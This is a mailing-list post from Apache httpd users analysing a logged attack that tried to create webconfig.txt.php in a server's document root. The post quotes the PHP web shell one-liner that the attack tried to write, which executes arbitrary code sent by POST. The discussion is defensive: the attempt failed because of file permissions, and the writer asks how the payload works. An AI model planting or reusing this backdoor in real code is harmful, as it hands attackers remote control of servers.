----- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.lentes@xxxxxxxxxxxxxxxxxxxxx wrote: > ----- On Feb 6, 2017, at 5:54 PM, Jack Swan john.swan@xxxxxxxxxx wrote: > >> The first line is trying to create the file webconfig.txt.php in your >> DOCUMENT_ROOT directory, with the contents of the file being: >> >> <?php eval($_POST[1]);?> >> >> I didn't decode the remaining lines. I think they're just trying to do the same >> thing. >> >> > > You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is > helpful. > > OK. I think i understand most of it. First the attacker sets some values appropriate for him. Then he tries to create a file webconfig.txt.php and to write <?php eval($_POST[1]);?> in it. Fortunately wwwrun can't write in /sr/www ... , following http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago. If he could create the file, then he is able to sent arbitrary stuff to it which is executed by eval. Some things are still unclear for me: What is the purpose of the two echos ? Why has the request status code 200 ? What is the purpose of the 1 direct behind the question mark ? What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not a php developer). Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx